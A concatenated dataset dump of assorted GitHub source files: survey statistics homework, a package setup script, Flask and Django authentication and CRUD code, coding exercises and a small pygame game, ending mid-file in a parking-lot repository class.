annot=trustPoliceGender, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(trustPoliceGender, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Wie aus den Diagrammen ersichtlich, stimmt diese Aussage nicht\n# Tendenziell vertrauen Frauen der Polizei mehr als Männer\n# Und das obwohl auch ein größerer Anteil an Frauen keine Aussage dazu treffen wollten\n\n\n\n#1.3 b\nnCorrNucSun = df[[\"elgnuc\", \"elgsun\"]]\ndfNCorr = pd.crosstab(nCorrNucSun[\"elgnuc\"], nCorrNucSun[\"elgsun\"])\n\ncorr, p = sp.spearmanr(nCorrNucSun[\"elgnuc\"], nCorrNucSun[\"elgsun\"])\nprint(corr)\n\ns.heatmap(dfNCorr, annot=False, cmap=\"YlGnBu\")\ns.heatmap(dfNCorr, annot=dfNCorr, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(dfNCorr, annot=False, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\nprint(\"Es gibt einen negativen Zusammenhang zwischen mehr Strom aus nuklearer und solarer Energie\" if corr < 0 else \"Es gibt einen positiven Zusammenhang zwischen mehr Strom aus nuklearer und solarer Energie\" if corr > 0 else \"Es gibt keinen negativen Zusammenhang zwischen mehr Strom aus nuklearer und solarer Energie\")\n\n# Wie bereits durch die Berechnung des Zusammenhanges bekannt, hängen die zwei Energiearten negativ zusammen \n# Das heißt, dass wenn es von einer dieser Energiequellen mehr Energie gibt, wird weniger von der anderen benötigt\n# Zusätztlich wird dieses Ergebnis durch das Diagramm bestätigt\n\n\n\n#1.3 c\nclimateFeeling = df[\"ccgdbd\"]\ncountries = df[\"cntry\"].loc[df[\"cntry\"].isin([\"AT\", \"HU\"])]\nclimateFeelingATHU = pd.crosstab(climateFeeling, countries, normalize=\"index\")\nclimateFeelingATHU.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(climateFeelingATHU)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(climateFeelingATHU, annot=False, cmap=\"YlGnBu\")\ns.heatmap(climateFeelingATHU, annot=climateFeelingATHU, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(climateFeelingATHU, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Wie aus den Diagrammen gut ersichtlich ist, wirkt der Klimawandel\n# schlechter auf Österreicher, als auf Ungarer\n# Diese Aussage wird durch die Berechung zusätzlich gefestigt\n\n\n\n#1.3 d\nbaseIncome = df[\"basinc\"]\nbaseIncGender = pd.crosstab(baseIncome, gender, normalize=\"index\")\nbaseIncGender.plot.bar()\nm.show()\n\nstats, p = sp.mannwhitneyu(baseIncome.loc[df[\"gndr\"] == \"Male\"], baseIncome.loc[df[\"gndr\"] == \"Female\"])\nprint(stats, \"\\n\", p,)\n\ns.heatmap(baseIncGender, annot=False, cmap=\"YlGnBu\")\ns.heatmap(baseIncGender, annot=baseIncGender, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(baseIncGender, annot=False, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Die Aussage, dass Frauen eher einem bedingungslosen Einkommmen zustimmen ist wahr\n# Dies wird besonders bei Betrachtung der Diagramme ersichtlich, da dort vor allem bei einer starken Bewertung (7-9)\n# der Anteil an Frauen bei weitem größer ist, als der Anteil an Männern\n\n\n\n#1.3 e1\nhydroEnergy = df[\"elghydr\"]\ncountries = df[\"cntry\"].loc[df[\"cntry\"].isin([\"AT\", \"DE\"])]\nhydroEnergyATDE = pd.crosstab(hydroEnergy, countries, normalize=\"index\")\nhydroEnergyATDE.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(hydroEnergyATDE)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(hydroEnergyATDE, annot=False, cmap=\"YlGnBu\")\ns.heatmap(hydroEnergyATDE, annot=hydroEnergyATDE, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(hydroEnergyATDE, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Bei genauerer Untersuchung der Interessen der Bevölkerung zur Thematik der Wasserkraft, stellte sich heraus,\n# dass Deutsche bei weitem mehr daran interessiert sind einen Großteil ihrer Energie durch Wasskraft zu gewinnen\n# als Österreicher\n\n\n\n#1.3 e2\nattachedToCountry = df[\"atchctr\"]\ncountries = df[\"cntry\"].loc[df[\"cntry\"].isin([\"AT\", \"FR\"])]\naTC_ATFR = pd.crosstab(attachedToCountry, countries, normalize=\"index\")\naTC_ATFR.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(aTC_ATFR)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(aTC_ATFR, annot=False, cmap=\"YlGnBu\")\ns.heatmap(aTC_ATFR, annot=aTC_ATFR, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(aTC_ATFR, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Sowohl Franzosen als auch Österreicher hängen stark an ihrem Land\n# Wie bereits aus dem Diagramm erischtlich, ist es eine sehr knappe Entscheidung\n# Österreicher hängen jedoch mit 51,35%, um etwa 2,7% mehr an ihrem Land als Franzosen ","repo_name":"Stingaaa/5BHW","sub_path":"INFI/Aufgabe5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36092989777","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name = 'cbtool',\n\n\n version = '3.0.5',\n author = 'Marcio Silva, Michael Galaxy',\n author_email = 'cbtool-admin@googlegroups.com',\n description = 'CloudBench: Cloud Rapid Experimentation and Analysis Toolkit',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url = 'https://github.com/ibmcb/cbtool',\n\n python_requires='>=3.6',\n\n # Currently, the only thing we provided on PyPi is the core library.\n # Getting a fully-fledged instance of CB installed will require\n # a proper DEB to be prepared. This just solves the issue of talking\n # talking to the cloudbench API using an already-installed version\n # of cloudbench. \n\n packages = ['cbtool', 'cbtool/lib', 'cbtool/lib/api', 'cbtool/lib/auxiliary', 'cbtool/lib/clouds', 'cbtool/lib/operations', 'cbtool/lib/remote', 'cbtool/lib/stores'],\n\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.6',\n ],\n download_url = 'https://github.com/ibmcb/cbtool/archive/3.0.tar.gz',\n keywords = ['cloudbench', 'cloud', 'benchmarking', \"spec\"],\n\n # Currently, we've only listed packages listed as `= pip`\n # from the PUBLIC_dependencies.txt file, because pip install\n # can only recursively attempt to install pip-registered projects.\n # If we want to enable *all* dependencies, we're going to have to fork\n # and register cbtool-needed projects under the CloudBench user account on PyPi.\n install_requires = [\n 'prettytable',\n 'python-daemon',\n 'twisted',\n 'webob',\n 'beaker',\n 'python-redis',\n 'pymongo',\n 'pypureomapi',\n 'python-novaclient',\n 'python-neutronclient',\n 'python-cinderclient',\n 'python-glanceclient',\n 'softlayer',\n 'boto',\n 'apache-libcloud',\n 'docker',\n 'pylxd',\n 'pykube',\n 'docutils',\n 'markup',\n 'pyyaml',\n 'ruamel-yaml',\n 'urllib3',\n 'httplib2shim',\n 'python-dateutil',\n 'pillow',\n 'jsonschema',\n 'mysql-connector',\n 'distro'\n ],\n)\n","repo_name":"ibmcb/cbtool","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"40"} +{"seq_id":"71314848439","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"compression_rle\n\nFonctions pour notebook sur la compression RLE\n\nAuteurs : Martin Canals et Pierre-William Martelli\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nPBM_EXERCICE = [0] * 25\n\n\ndef affichage_pbm(larg, haut, liste_pbm):\n \"\"\"\n affichage_pbm(larg, haut, liste_pbm)\n\n Affiche une image donnee sous format PBM\n larg : nombre de pixels horizontaux\n haut : nombre de pixels verticaux\n liste_pbm : liste de 0 et de 1 qui represente l'image au format PBM\n\n \"\"\"\n dims = (haut, larg)\n mat = np.zeros(dims)\n for row in range(dims[0]):\n for col in range(dims[1]):\n mat[row, col] = (liste_pbm[col + row * dims[1]] + 1) % 2\n\n plt.matshow(mat, cmap='gray')\n plt.show()\n\n\ndef mystere(liste):\n \"\"\"\n mystere(liste)\n\n Fonction mystere. Prend une liste en argument, et renvoie une liste\n\n \"\"\"\n retour = []\n bit = 0\n for i in range(len(liste)):\n for j in range(liste[i]):\n retour.append(bit)\n bit = (bit + 1) % 2\n return retour\n\n\ndef affichage_rle(larg, haut, liste_rle):\n \"\"\"\n affichage_rle(larg, haut, liste_rle)\n\n Affiche une image donnee sous format RLE\n larg : nombre de pixels horizontaux\n haut : nombre de pixels verticaux\n liste_rle : liste de nombre qui represente l'image au format PBM\n\n \"\"\"\n affichage_pbm(larg, haut, mystere(liste_rle))\n\n\ndef exercice_aleatoire():\n \"\"\"\n exercice_aleatoire()\n\n Genere une image aleatoire de taille 5x5 au format PBM, et l'affiche\n\n \"\"\"\n matrice_alea = np.random.randint(2, size=(5, 5))\n for row in range(5):\n for col in range(5):\n PBM_EXERCICE[col + row * 5] = matrice_alea[row, col]\n print('PBM_EXERCICE = ', PBM_EXERCICE)\n affichage_pbm(5, 5, PBM_EXERCICE)\n\n\ndef verif_exercice(rle_reponse):\n \"\"\"\n verif_exercice()\n\n Teste si rle_reponse correpond a la compression RLE de PBM_EXERCICE, et\n l'affiche\n rle_reponse : tableau d'entiers, representant le format RLE d'une image\n\n \"\"\"\n if mystere(rle_reponse) == PBM_EXERCICE:\n print('Exercice réussi !')\n else:\n print('Exercice non réussi...')\n if sum(rle_reponse) == 25:\n affichage_rle(5, 5, rle_reponse)\n else:\n print('La somme des entiers de votre tableau devrait être égale à 25 !')\n","repo_name":"pwmartelli/rle","sub_path":"compression_rle.py","file_name":"compression_rle.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22119386660","text":"from flask import Flask, session, request, g, send_file, redirect, render_template, url_for\nfrom shared import app, db, bcrypt\nfrom models import *\n\n# user auth\n@app.before_request\ndef verify_user():\n\tif 'session_id' in session:\n\t\ttry:\n\t\t\tg.user = Session.query.filter_by(\n\t\t\t\t\tsession_id=session['session_id']).first().user.username\n\t\texcept AttributeError:\n\t\t\tsession.pop('session_id')\n\telse:\n\t\tg.user = None\n\n# serve app\n@app.route(\"/\")\ndef index():\n\treturn render_template('index.html')\n\n@app.route(\"/\")\ndef static_file(path):\n\treturn send_from_directory('/static', path)\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n\tif request.method == 'GET':\n\t\tif g.user:\n\t\t\treturn redirect(url_for(\"index\"))\n\t\telse:\n\t\t\treturn send_file('./static/login.html')\n\telif request.method == 'POST':\n\t\tuser = User.login(request.form['username'], request.form['password'])\n\t\tif user:\n\t\t\tg.user = user.username\n\t\t\tsession['session_id'] = Session.create(user.id).session_id\n\t\t\treturn redirect(url_for(\"index\"))\n\t\telse:\n\t\t\treturn redirect(url_for(\"login\"))\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n\tif request.method == 'GET':\n\t\tif g.user:\n\t\t\treturn redirect(url_for(\"index\"))\n\t\telse:\n\t\t\treturn send_file('./static/signup.html')\n\telif request.method == 'POST':\n\t\ttry:\n\t\t\tuser = User.create(request.form['username'], request.form['password'])\n\t\t\tg.user = user.username\n\t\t\treturn redirect(url_for(\"index\"))\n\t\texcept:\n\t\t\treturn send_file('./static/signup.html')\n\n@app.route(\"/logout\")\ndef logout():\n\tcurrent_session = session.pop('session_id', None)\n\tif current_session:\n\t\tSession.destroy(current_session)\n\treturn redirect(url_for(\"index\"))\n\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', debug=True)\n","repo_name":"vitrvvivs/Flask-Auth","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18858606384","text":"# Day 8 we are dealing with dictionaries. We are to create a phonebook and then be able\n# to query this phonebook for a name and return the name=number.\n\n# It seems as if the maps work the same way as a dictionary in Python.\n# They are a way to store (key, value) data points that are stored into a datastructure.\n\n# Link: https://www.hackerrank.com/challenges/30-dictionaries-and-maps/problem\n\nphoneBook = {}\niteration = int(input())\nfor i in range(iteration):\n content = input().strip()\n content = content.split(\" \")\n\n if content[0] not in phoneBook:\n phoneBook[content[0]] = content[1]\n\nwhile True:\n try:\n inp = input()\n if inp in phoneBook:\n print(inp + \"=\" + phoneBook[inp])\n else:\n print(\"Not found\")\n except EOFError:\n break\n","repo_name":"speri203/Programming","sub_path":"Python/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18261133106","text":"import os\nimport time\nimport threading\nfrom downloadImages.Common import Extractor, Downloader\n\n\ndef main(keywords):\n folder = './' + keywords\n try:\n os.mkdir(folder)\n except FileExistsError:\n pass\n\n extractor = Extractor()\n downloader = Downloader(folder)\n\n refs = extractor.get_web_page_links(keywords)\n print(\"Found \", len(refs), \" websites\")\n\n start = time.time()\n\n def fun(_url, _path):\n _imgs = extractor.get_all_images(_url)\n print('Extracted {} images from {}'.format(len(_imgs), url))\n for _img in _imgs:\n downloader.download(_img, _path)\n\n threads = []\n for url in refs:\n t = threading.Thread(target=fun, args=(url, folder))\n t.start()\n threads.append(t)\n\n for thread in threads:\n thread.join()\n\n end = time.time()\n print('\\nTime spent downloading: {} seconds'.format(round(end - start), 1))\n\n\nif __name__ == '__main__':\n keys = input(\"\\nEnter key words to search for: \")\n main(keys)\n","repo_name":"mewmix/media-scraper","sub_path":"downloadImages/ImageDownloaderFromWebPages.py","file_name":"ImageDownloaderFromWebPages.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32656235012","text":"from urllib.request import urlopen, urlretrieve\r\nfrom bs4 import BeautifulSoup\r\n\r\n# В файле находится одна таблица.\r\n# Просуммируйте все числа в ней.\r\nresp = urlopen('https://stepik.org/media/attachments/lesson/209723/3.html') # скачиваем файл\r\nhtml = resp.read().decode('utf8') # считываем содержимое\r\nsoup = BeautifulSoup(html, 'html.parser') # делаем суп\r\ndata = soup.find_all('td')\r\nnumber = [int(d.text) for d in data]\r\nprint(sum(number))\r\n\r\n# В файле находится одна таблица.\r\n# Просуммируйте все числа в ней.\r\n# Теперь мы добавили разных тегов для изменения стиля отображения.\r\n# Для доступа к ячейкам используйте возможности BeautifulSoup.\r\nresp1 = urlopen('https://stepik.org/media/attachments/lesson/209723/4.html') # скачиваем файл\r\nhtml = resp1.read().decode('utf8') # считываем содержимое\r\nsoup = BeautifulSoup(html, 'html.parser') # делаем суп\r\ndata = soup.find_all('td')\r\nnumber = [int(d.text) for d in data]\r\nprint(*number)\r\nprint(sum(number))\r\n\r\nresp2 = urlopen('https://stepik.org/media/attachments/lesson/209723/5.html') # скачиваем файл\r\nhtml = resp2.read().decode('utf8') # считываем содержимое\r\nsoup = BeautifulSoup(html, 'html.parser') # делаем суп\r\ndata = soup.find_all('td')\r\nnumber = [int(d.text) for d in data]\r\nprint(sum(number))\r\n","repo_name":"sashnat/Homework","sub_path":"stepik_python_practice/1_4 lesson.py","file_name":"1_4 lesson.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21059825309","text":"# coding: utf-8\nfrom api.form import LoginForm\nfrom flask import request\nfrom common.utils import param_error\nfrom common.views import auth\nfrom models import UserInfo\nfrom common import const\nfrom flask_login import login_user, current_user\nfrom common.response import reply\nimport logging\n\n\ndef login():\n form = LoginForm(request.form)\n if not form.validate():\n return param_error(form.errors)\n user = UserInfo.query.filter_by(\n user_number=form.user_number.data,\n record_status=const.record_normal\n ).first()\n if not user or user.password != form.password.data:\n return reply(\n success=False,\n message=\"用户不存在或密码错误\"\n )\n if user.disabled == const.user_disabled_true:\n return reply(\n success=False,\n message=\"账号被冻结,无法登陆\"\n )\n auth.login(user)\n return reply(\n success=True,\n message=\"登陆成功\",\n )\n\n\ndef login_out():\n if current_user.is_authenticated:\n auth.login_out()\n return reply(\n success=True,\n )\n","repo_name":"KAGAnoRBQ/Reservation-Sysu","sub_path":"api/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35532864530","text":"def binary_search(array, target, start, end):\n while start <= end:\n mid = (start + end) // 2\n if array[mid] == target:\n return mid\n elif array[mid] > target:\n end = mid - 1\n else:\n start = mid + 1\n return None\n\nn = int(input())\ndata = list(map(int, input().split()))\nm = int(input())\nsearch_data = list(map(int, input().split()))\n\nfor i in search_data:\n res = binary_search(data, i, 0, n - 1)\n if res != None:\n print('yes', end=' ')\n else:\n print('no', end=' ')","repo_name":"wk1219/Algorithm-Prob","sub_path":"CodingTest/BinarySearch/7-5.py","file_name":"7-5.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16103349674","text":"from ..cluster import *\nfrom ..io.datasets import covid19_repertoire\nfrom ..io.output import get_cluster_contents, simple_single_cluster_output, path_in_results\nimport matplotlib.pyplot as plt\n\n\ndef main():\n data = covid19_repertoire()\n size_frequencies(data)\n random_representative_comparison(data)\n\n\ndef random_representative_comparison(data):\n representative = data.sample().keys()[0]\n s = ''\n for combo in PROPERTY_COMBINATIONS:\n index = profile_cluster(data, combo)\n cluster = get_cluster_of_representative(representative, index)\n s += ' + '.join(combo).upper() + '\\n'\n s += output_single_cluster_with_representative(cluster, representative, data) + '\\n'\n with open(path_in_results('profile_method/comparison/representative_clusters.txt'), 'w') as f:\n f.write(s)\n\n\ndef output_single_cluster_with_representative(cluster, representative, data):\n output = simple_single_cluster_output(cluster, data)\n representative_sequence = str(data[representative])\n return output.replace(representative_sequence, '> ' + representative_sequence)\n\n\ndef get_cluster_of_representative(representative, index):\n for cluster in get_cluster_contents(index):\n if representative in cluster:\n return cluster\n return None\n\n\ndef size_frequencies(data):\n for combo in PROPERTY_COMBINATIONS:\n index = profile_cluster(data, combo)\n fname = '_'.join(combo)\n name = 'cluster by ' + ' + '.join(combo)\n size_frequencies_plot(index, name, fname)\n\n\ndef size_frequencies_plot(index, name, fname):\n contents = get_cluster_contents(index)\n sizes = list(map(lambda x: len(x), contents))\n frequencies = {}\n for size in sizes:\n frequencies[size] = frequencies.get(size, 0) + 1\n x = sorted(frequencies.keys())\n y = []\n for point in x:\n y.append(frequencies[point])\n plt.figure()\n plt.bar(x, y)\n plt.axis([0, 50, 0, 300])\n plt.title(name)\n plt.xlabel('cluster size')\n plt.ylabel('amount of clusters')\n plt.savefig(fname=path_in_results(f'profile_method/comparison/{fname}.png'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"svalkiers/clusTCR","sub_path":"clustcr/modules/faiss_clustering/src/plots/compare_clusters.py","file_name":"compare_clusters.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"40"} +{"seq_id":"41623812698","text":"from django import forms\nfrom .models import Role, Task\nfrom django.contrib.admin.widgets import AdminDateWidget\n\nclass RoleForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(RoleForm, self).__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs = {\n 'class': 'form-control'\n }\n class Meta:\n model = Role\n fields = ('title',)\n labels = {'title' : '役割名'}\n\nclass TaskForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(TaskForm, self).__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs = {\n 'class': 'form-control'\n }\n class Meta:\n STATUS_CHOICES = [(1, '未完了'),(2, '作業中'),(3, '完了')]\n model = Task\n fields = ('title', 'status','due_date')\n labels = {\n 'title': 'タスク名',\n 'status': '状態',\n 'due_date': '期限',\n }","repo_name":"takusugar0/weekplan","sub_path":"weekplan_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25821787136","text":"from django.db import models\nfrom datetime import datetime\nfrom pessoas.models import Pessoa\n\nclass Receita(models.Model):\n pessoa = models.ForeignKey(Pessoa, on_delete=models.CASCADE)\n nome_receita = models.CharField(max_length=200)\n ingredientes = models.TextField()\n modo_preparo = models.TextField()\n tempo_preparo = models.IntegerField()\n rendimento = models.CharField(max_length=100)\n categoria = models.CharField(max_length=100)\n data_receita = models.DateTimeField(default=datetime.now, blank=True)\n publicada = models.BooleanField(default=False)\n foto_receita = models.ImageField(upload_to='fotos/%Y/%m/%d', blank=True)\n \n def __str__(self):\n return self.nome_receita\n\n def clean(self):\n self.categoria = self.categoria.capitalize()\n self.nome_receita = self.nome_receita.capitalize()\n\n# Receita.objects.create(nome_receita=\"Bolo de Chocolate\",\n# ingredientes=\"-Farinha\\n -Ovo\\n Leite\\n Chocolate\\n Pó de arroz\",\n# modo_preparo=\"Mexer tudo, mexe bem até ter uma massa homogenea boa\",\n# tempo_preparo=40,\n# rendimento=\"5 Pessoas\",\n# categoria=\"Doces\")\n\n\n\n\n\n\n\n","repo_name":"brenascimento/Receitas-Django","sub_path":"receitas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70951625722","text":"\n# Импортируем библиотеку pygame\nimport pygame\nfrom pygame import *\nfrom Player import *\nfrom Security import *\nimport time\n\n\n# Объявляем переменные\nWIN_WIDTH = 1000 # Ширина создаваемого окна\nWIN_HEIGHT = 500 # Высота\nDISPLAY = (WIN_WIDTH, WIN_HEIGHT) # Группируем ширину и высоту в одну переменную\nBACKGROUND_COLOR = \"#004400\"\n\n\ndef main():\n pygame.init() # Инициация PyGame, обязательная строчка\n\n screen = pygame.display.set_mode(DISPLAY) # Создаем окошко\n pygame.display.set_caption(\"Kate adventure\") # Пишем в шапку\n background_image = pygame.image.load('Images/imgonline-com-ua-Resize-CBt8AmKAPc-AmoyShare.png')\n\n\n left = right = False # по умолчанию - стоим\n\n sec = Security(600, 300)\n hero = Player(100, 250) # создаем героя по (x,y) координатам\n\n timer = pygame.time.Clock()\n\n entities = pygame.sprite.Group()\n entities.add(hero)\n entities.add(sec)\n\n pygame.mixer.pre_init(44100, 16, 2, 4096)\n music = pygame.mixer.music.load('Images/casey-edwards-feat (mp3cut.net).mp3')\n pygame.mixer.music.play(-1, 0.0)\n\n\n\n\n while True:\n screen.blit(background_image, (0, 0)) # Основной цикл программы\n timer.tick(40)\n for e in pygame.event.get(): # Обрабатываем события\n if e.type == QUIT:\n raise SystemExit\n if e.type == KEYDOWN and e.key == K_LEFT:\n left = True\n if e.type == KEYDOWN and e.key == K_RIGHT:\n right = True\n if e.type == KEYUP and e.key == K_RIGHT:\n right = False\n if e.type == KEYUP and e.key == K_LEFT:\n left = False\n if e.type == KEYDOWN and e.key == K_ESCAPE:\n raise SystemExit\n\n\n\n if hero.rect.x >= 700:\n screen.fill((0, 0, 0))\n screen.blit(pygame.image.load('Images/20230221_224141 (1).jpg'), (300, 0))\n pygame.display.update()\n time.sleep(1.5)\n hero.rect.x = 100\n\n if (((hero.rect.x - sec.rect.x)**2 + (hero.rect.y - sec.rect.y)**2)**0.5 < 60) and (hero.rect.x < sec.rect.x) and (hero.rect.y > sec.rect.y):\n screen.fill((0, 0, 0))\n screen.blit(pygame.image.load('Images/imgonline-com-ua-Resize-QOaXSVgW8gb0.jpg'), (170, 0))\n pygame.display.update()\n time.sleep(1.5)\n hero.rect.x = 100\n\n\n hero.update(left, right) # передвижение\n sec.update() # передвижение\n entities.draw(screen)\n entities.empty()\n if hero.rect.y > sec.rect.y:\n entities.add(sec)\n entities.add(hero)\n else:\n entities.add(hero)\n entities.add(sec)\n\n\n\n pygame.display.update() # обновление и вывод всех изменений на экран\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PapaOfficial/Kate_adventure","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6157760622","text":"\"\"\"newsroomFramework URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\n\nfrom cms.views import *\nfrom kms.views import *\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^kms/$', kms),\n url(r'^add/$', ArticleCreateView.as_view(), name='article-add'),\n url(r'^(?P\\d+)/edit/$', ArticleUpdateView.as_view(), name='article-edit'),\n url(r'^(?P\\d+)/delete/$', ArticleDeleteView.as_view(), name='article-delete'),\n url(r'^(?P\\d+)/publish/$', PublishedArticle, name='article-publish'),\n url(r'^(?P\\d+)/publish/rdf$', PublishedRdf, name='article-rdf'),\n url(r'^search/', ArticleSearchView.as_view(), name='article-search'),\n url(r'^list/', ArticleListView.as_view(), name='article-list'),\n url(r'^menu/', Menu, name='menu'),\n]\n","repo_name":"Benedito-Medeiros-Neto-UnB/TacProgWeb","sub_path":"web-ontology/newsroomFramework-master/newsroomFramework/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30320556589","text":"from typing import Optional, Iterable, Tuple, Union\nimport logging\n\nfrom uuid import uuid4\nfrom dependency_injector.wiring import Provide, inject\nfrom sqlalchemy.orm import Session\n\nfrom src.classes import UserSession, ValorHoraInput, FileStream\nfrom src.enums import UserType\nfrom src.exceptions import ValidationError\nfrom src.models import HorarioPadrao, Estacionamento, Endereco, Upload\nfrom src.services import Uploader, ImageProcessor\nfrom src.container import Container\nfrom src.utils import validate_telefone\n\n\nclass EstacionamentoCrudRepo:\n ERRO_TOTAL_VAGA_INV = 'total_vaga_nao_positivo'\n ERRO_HORA_P_INV = 'hora_padrao_fecha_depois_de_abrir'\n ERRO_DESC_GRANDE = 'descricao_muito_grande'\n ERRO_VALOR_HORA_NAO_POSITIVO = 'valor_hora_preco_nao_positivo'\n ERRO_VALOR_HORA_VEICULO_NAO_ENCONTRADO = 'valor_hora_veiculo_nao_encontrado'\n ERRO_SEM_PERMISSAO = 'sem_permissao'\n ERRO_CADASTRO_FINALIZADO = 'cadastro_ja_terminado'\n ERRO_ESTACIO_NAO_ENCONTRADO = 'estacio_nao_encontrado'\n ERRO_CADASTRO_NAO_FINALIZADO = 'cadastro_nao_terminado'\n ERRO_NOME_GRANDE = 'nome_muito_grande'\n TEL_MUITO_GRANDE = 'telefone_muito_grande'\n TEL_FORMATO_INV = 'telefone_formato_invalido'\n TEL_SEM_COD_INTER = 'telefone_sem_cod_internacional'\n FOTO_FORMATO_INVALIDO = 'foto_formato_invalido'\n FOTO_PROCESSING_ERRO = 'foto_processing_error'\n ERRO_UPLOAD = 'upload_error'\n\n GROUP_UPLOAD_FOTO = 'foto_estacio'\n\n @inject\n def __init__(\n self,\n width_foto: int,\n height_foto: int,\n uploader: Uploader = Provide[Container.uploader], \n image_proc: ImageProcessor = Provide[Container.image_processor]\n ) -> None:\n self.width_foto = width_foto\n self.height_foto = height_foto\n self.uploader = uploader\n self.image_processor = image_proc\n\n def create(\n self, user_sess: UserSession, sess: Session,\n total_vaga: int,\n horario_padrao: HorarioPadrao,\n valores_hora: Optional[Iterable[ValorHoraInput]] = None,\n estacio_id: Optional[str] = None,\n descricao: Optional[str] = None\n ) -> Tuple[bool, Union[str, Estacionamento]]:\n if user_sess is None:\n return False, self.ERRO_SEM_PERMISSAO\n\n adm = user_sess.user \n if user_sess.tipo == UserType.SISTEMA:\n estacio: Estacionamento = sess.query(Estacionamento).get(estacio_id)\n else:\n estacio: Estacionamento = adm.estacionamento\n\n if estacio is None:\n return False, 